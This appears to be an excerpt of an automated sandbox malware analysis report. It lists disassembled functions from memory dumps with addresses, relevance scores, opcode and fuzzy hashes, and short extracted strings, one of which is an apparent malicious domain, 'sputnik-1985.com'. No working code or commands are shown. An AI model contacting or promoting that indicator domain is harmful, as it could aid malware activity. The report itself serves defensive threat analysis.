                                                                                                                                                                                                              • Instruction ID: 9ed90cc73041a5fc56db56e855eaf03129557bb88218118140f49c72216ffa24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61a1fe6748ad5f59d2a0296a15b8624181594235dc00955c07ac8bdb611d6f56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37F29377B583154BC71CCE59DC9129AB3D2EBC4214F0EC93DE889D7305EA7CE90A8A85
                                                                                                                                                                                                              Function 02474E67 Relevance: 3.3, Strings: 2, Instructions: 810COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0$8
                                                                                                                                                                                                              • API String ID: 0-46163386
                                                                                                                                                                                                              • Opcode ID: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction ID: a7907e3acbaa69f0af0303794999f41cf7316645c869c84caf6fb397bfa3860d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E47237716083819FD721CF18C980BABBBE1BF84314F44891EF9A98B391D775D958CB92
                                                                                                                                                                                                              Function 00404C00 Relevance: 3.3, Strings: 2, Instructions: 810COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0$8
                                                                                                                                                                                                              • API String ID: 0-46163386
                                                                                                                                                                                                              • Opcode ID: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction ID: b1525a476907180d25a47be565f680916eaa3fdda84d94db1dd46bc05e860da8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 147235716083419FD720CF28C880B9BBBE1BF98314F04892EF99997391D779D958CB96
                                                                                                                                                                                                              Function 024ABD27 Relevance: 3.2, Strings: 2, Instructions: 652COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: f$sppv
                                                                                                                                                                                                              • API String ID: 0-3758886653
                                                                                                                                                                                                              • Opcode ID: 6bf2b024e7c37cb1c328ab3d0845dffd59fad0e260c428b5febaee876b6ae751
                                                                                                                                                                                                              • Instruction ID: f2edf99051e3b59447172e99341901819a371e05eaea960dc714b30c1113c734
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bf2b024e7c37cb1c328ab3d0845dffd59fad0e260c428b5febaee876b6ae751
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 222225726083418FD314CF29C89076FB7E2EBE9314F188A6EE9E597391D775E8058B42
                                                                                                                                                                                                              Function 0247CD32 Relevance: 3.1, Strings: 2, Instructions: 631COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: sputnik-1985.com$~q
                                                                                                                                                                                                              • API String ID: 0-1915957273
                                                                                                                                                                                                              • Opcode ID: a8870b9a4f3b980b938fa48d5994c28d1c9e772060d2e1a27d454703c0a37853
                                                                                                                                                                                                              • Instruction ID: 317ceaa927d651bc8cc03da3fea2684b2c7e4b6aaa4e39dc5d857e9165b32db2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8870b9a4f3b980b938fa48d5994c28d1c9e772060d2e1a27d454703c0a37853
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A81222B16147828FD329CF39C590652FBA2FF86300728869DC4E28FB56C735E856CB84
                                                                                                                                                                                                              Function 0040CACB Relevance: 3.1, Strings: 2, Instructions: 631COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: sputnik-1985.com$~q
                                                                                                                                                                                                              • API String ID: 0-1915957273
                                                                                                                                                                                                              • Opcode ID: a8870b9a4f3b980b938fa48d5994c28d1c9e772060d2e1a27d454703c0a37853
                                                                                                                                                                                                              • Instruction ID: cd6389ac3794ccf5df598f8629732079cb249375d772afe08be5bd4da6ab97e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8870b9a4f3b980b938fa48d5994c28d1c9e772060d2e1a27d454703c0a37853
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 801202B52047428FD329CF39C591652FBA2FF9630072886ADC4D68FB96C735E856CB84
                                                                                                                                                                                                              Function 0043E4D0 Relevance: 3.1, Strings: 2, Instructions: 578COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: BC$RC
                                                                                                                                                                                                              • API String ID: 0-2898860023
                                                                                                                                                                                                              • Opcode ID: 7f90358990b925653ad0c9ef5d8743d9c5817565f461062fa55992ab27f4502e
                                                                                                                                                                                                              • Instruction ID: 26d9a137851d7099c8628a03fdadcf2bca312d49d7b78661efd61bfb7259b8a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f90358990b925653ad0c9ef5d8743d9c5817565f461062fa55992ab27f4502e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5002DF39609351CFD708CF28E89022BB7E2FB8A315F0A997DD586873A1D734AC45DB45
                                                                                                                                                                                                              Function 0248D0C7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: # $hi
                                                                                                                                                                                                              • API String ID: 0-1182784408
                                                                                                                                                                                                              • Opcode ID: 31280aa5f35ebfcd4156247e9fb3f46fa57d6d39b03f79913305289be1f4ff7a
                                                                                                                                                                                                              • Instruction ID: 902522bad029fb1200b50c6e542256a12200ade96a7e981702f619b279a261ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31280aa5f35ebfcd4156247e9fb3f46fa57d6d39b03f79913305289be1f4ff7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07B1DE71929340CBC724EF28C85166BB7F1EFC6318F18896DE8968B391E374D905C756
                                                                                                                                                                                                              Function 02491A77 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: fW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-3486923430
                                                                                                                                                                                                              • Opcode ID: d33c5e3019c976c54e0f6e465ae12b4017a899a0162bfe3b3f3f90cabf4a54c5
                                                                                                                                                                                                              • Instruction ID: 98f488c4070bd5e1a9d669a26c5c6fb4e8660131587b91e31237de31ebd3fc62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d33c5e3019c976c54e0f6e465ae12b4017a899a0162bfe3b3f3f90cabf4a54c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FB158729043529BDB14DF29C88166BBBF1EF81324F19892EE89D97380E375E905C792
                                                                                                                                                                                                              Function 00421810 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: fW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-3486923430
                                                                                                                                                                                                              • Opcode ID: 48c5d4c5725e74fee8fcc4792ea362b033f4db0a76bf2ceeceb6524e4fede989
                                                                                                                                                                                                              • Instruction ID: 1bcebc38c7b3c05311436fc530b14319c88d6a79ef350f497307808a03da47ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48c5d4c5725e74fee8fcc4792ea362b033f4db0a76bf2ceeceb6524e4fede989
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32B13672A043209BD714DF24A89266BB3F0EFA1364F59852EEC8597391E33CDD05C79A
                                                                                                                                                                                                              Function 00426050 Relevance: 2.9, Strings: 2, Instructions: 380COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 9`B$VeB
                                                                                                                                                                                                              • API String ID: 0-1298788025
                                                                                                                                                                                                              • Opcode ID: 3ee71565b18daa734946a3fb8f8adc6419e37bf20a03bed6747700a1eb379612
                                                                                                                                                                                                              • Instruction ID: 9462def1fd733a90003479a8e04a37643c430ca8bad2b62fd87e6986ff140be6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ee71565b18daa734946a3fb8f8adc6419e37bf20a03bed6747700a1eb379612
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFC141B0619391CFD304AF25E89232BBBE5EF96308F49487DF5C587281D739C9098B5A
                                                                                                                                                                                                              Function 004288D0 Relevance: 2.9, Strings: 2, Instructions: 372COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: AQLS$EEAW
                                                                                                                                                                                                              • API String ID: 0-1298809109
                                                                                                                                                                                                              • Opcode ID: bb1a3e4d5ac96490f0adfc8a75cd4250504f8c8d59fb14b1dce1e6668611cf43
                                                                                                                                                                                                              • Instruction ID: de0b6aa2db32326e8bdd01401a39ef128a4df9e9c575fa9b794ab05248a486f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb1a3e4d5ac96490f0adfc8a75cd4250504f8c8d59fb14b1dce1e6668611cf43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D1687660C3A0CFD3048F28E85122FBBE1AF86314F498A6DF4D597391DB399905CB46
                                                                                                                                                                                                              Function 02474527 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: )$IEND
                                                                                                                                                                                                              • API String ID: 0-707183367
                                                                                                                                                                                                              • Opcode ID: 8487ce4f5c8d1fdd914613c53bbda575351fbb27d0100e921ba60ae5bf8ebae7
                                                                                                                                                                                                              • Instruction ID: 9decf4cfe1b37f1535d19e6f98d33a0ef0addb227ae7bd224206aac52db9c5fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8487ce4f5c8d1fdd914613c53bbda575351fbb27d0100e921ba60ae5bf8ebae7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7D191B15083449FD710CF28C844BABBBE5EF94304F14492EF9A99B381D776E949CB92
                                                                                                                                                                                                              Function 0249BEC5 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: '$7
                                                                                                                                                                                                              • API String ID: 0-2333527518
                                                                                                                                                                                                              • Opcode ID: 666ce40b6bd7ed6f50ebd248e043bfdd137de20182591f70143a41f7d96f54e6
                                                                                                                                                                                                              • Instruction ID: 44dbe5eedcaf482de2b4296ff8e5050fca05ba876a7ec4ea5cd41a30795bba38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 666ce40b6bd7ed6f50ebd248e043bfdd137de20182591f70143a41f7d96f54e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5071257160C3918BE719CA39C4A077BBFD19FD6604F28895EE4D68B391C6758805CB92
                                                                                                                                                                                                              Function 0042BC5E Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: '$7
                                                                                                                                                                                                              • API String ID: 0-2333527518
                                                                                                                                                                                                              • Opcode ID: 666ce40b6bd7ed6f50ebd248e043bfdd137de20182591f70143a41f7d96f54e6
                                                                                                                                                                                                              • Instruction ID: a2b98e621ad00b39ae78970f67543d2923e68ff78dff89b9c71d9923e976bea8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 666ce40b6bd7ed6f50ebd248e043bfdd137de20182591f70143a41f7d96f54e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F713B7170C3A18BD319CB3594A077BBBD19FD6314F69895EE4D68B392C6398C01CB92
                                                                                                                                                                                                              Function 02485C9D Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 7$gfff
                                                                                                                                                                                                              • API String ID: 0-3777064726
                                                                                                                                                                                                              • Opcode ID: d4fb1bcfc46cef7b9411a419cca149341c842c108835c3b4dfb6b249e3b62493
                                                                                                                                                                                                              • Instruction ID: 1682509dfc3270d8b61b2830cc0e041dbc31cdc2417c1e4a6df5c287ef68b96d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4fb1bcfc46cef7b9411a419cca149341c842c108835c3b4dfb6b249e3b62493
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00814972A142114FD728CF29CC527AB77D2EBC5318F19853ED996CB391EB3898468F81
                                                                                                                                                                                                              Function 00415A36 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 7$gfff
                                                                                                                                                                                                              • API String ID: 0-3777064726
                                                                                                                                                                                                              • Opcode ID: ae2064514b9f27f5a651f1401ca2c20bf87ee7782395570218442427b317aec3
                                                                                                                                                                                                              • Instruction ID: f54fbbfb71c68dcae3c9463ada5fa6a00f479ea9b4beb001466b6334d2a6d2e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2064514b9f27f5a651f1401ca2c20bf87ee7782395570218442427b317aec3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC816B72A046118FD728CF28CC523EB77D2EBC5314F19823ED896CB3D1DA3898468B85
                                                                                                                                                                                                              Function 0249BF6C Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: '$7
                                                                                                                                                                                                              • API String ID: 0-2333527518
                                                                                                                                                                                                              • Opcode ID: 239284f8ee19b92c3366a79910fc32d17c4de04c87e6a2266dbd8afbf605f572
                                                                                                                                                                                                              • Instruction ID: 23940cf18ec4a4a811e97342d2ad72a4de0317650735eb5c825e2f8cc3aa50a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 239284f8ee19b92c3366a79910fc32d17c4de04c87e6a2266dbd8afbf605f572
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B71377160C3918BE729CB35C4A077BBFD19FD7604F28895EE4D68B391C6758805CB92
                                                                                                                                                                                                              Function 0042BD05 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: '$7
                                                                                                                                                                                                              • API String ID: 0-2333527518
                                                                                                                                                                                                              • Opcode ID: 239284f8ee19b92c3366a79910fc32d17c4de04c87e6a2266dbd8afbf605f572
                                                                                                                                                                                                              • Instruction ID: b4456767bc3c1748171b55d7085e5de6012a82a30b9192fdf5db675fe96add05
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 239284f8ee19b92c3366a79910fc32d17c4de04c87e6a2266dbd8afbf605f572
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33714D7160C3A18BD319CB3594A077BBBD19FD2314F29895EE4D68B392C6388C01C792
                                                                                                                                                                                                              Function 0041D2B1 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: D/()$D/()
                                                                                                                                                                                                              • API String ID: 0-2501469423
                                                                                                                                                                                                              • Opcode ID: 3aee4879701548e1acb7821b9ca7450ab31dac55e10082aac33b1898f2e5bf80
                                                                                                                                                                                                              • Instruction ID: bc7ca436c3156e6c893ea4ff65893c335ba1be737de9e599e5c1c635bad710f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3aee4879701548e1acb7821b9ca7450ab31dac55e10082aac33b1898f2e5bf80
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A151E2B5A0C3108BD7149F24D8412ABB7F2EFE2708F18856DE4C54B351E33AD606CB5A
                                                                                                                                                                                                              Function 0041D2C4 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: D/()$D/()
                                                                                                                                                                                                              • API String ID: 0-2501469423
                                                                                                                                                                                                              • Opcode ID: 8002e088e2fbb42d0f6c3b1ef4ee116135a4ff9d052e6165a11020f212ac45ac
                                                                                                                                                                                                              • Instruction ID: e9df8d6263b7d037eeea5f3383091ab454a38357756e2feddc5c2a68480c9a01
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8002e088e2fbb42d0f6c3b1ef4ee116135a4ff9d052e6165a11020f212ac45ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1951D1B5A0C3108BD7149F24D8416ABB7F2EFE2708F18856EE4C54B391E33AD506CB5A
                                                                                                                                                                                                              Function 024A8734 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-702728626
                                                                                                                                                                                                              • Opcode ID: e66a040356001101f04f40d5487d14d3ab67ea6275ffdc7a45723590885668ad
                                                                                                                                                                                                              • Instruction ID: cad4ca143e6a2a9a878fa4f28621d56e9178872df97750c9db49cc5da43b3698
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e66a040356001101f04f40d5487d14d3ab67ea6275ffdc7a45723590885668ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 265168767183048FC318AEA89DC116BF3E2FBA4310F19443ED8909B351E774DC4A9B85
                                                                                                                                                                                                              Function 004188D8 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: <9:{
                                                                                                                                                                                                              • API String ID: 0-1383936215
                                                                                                                                                                                                              • Opcode ID: 66584328977842c6fd5ed33418a889860880f2f6de9bebffe95cc255ee1b6b1c
                                                                                                                                                                                                              • Instruction ID: d280ce2202881725c6d7d96a654b5151bb5f27da2e0d29df6e01eb89a14c629f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66584328977842c6fd5ed33418a889860880f2f6de9bebffe95cc255ee1b6b1c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBD15A716183508BD725CF24C8507EBBBE1FBDA310F184A6ED4C59B383DB388845879A
                                                                                                                                                                                                              Function 00439187 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
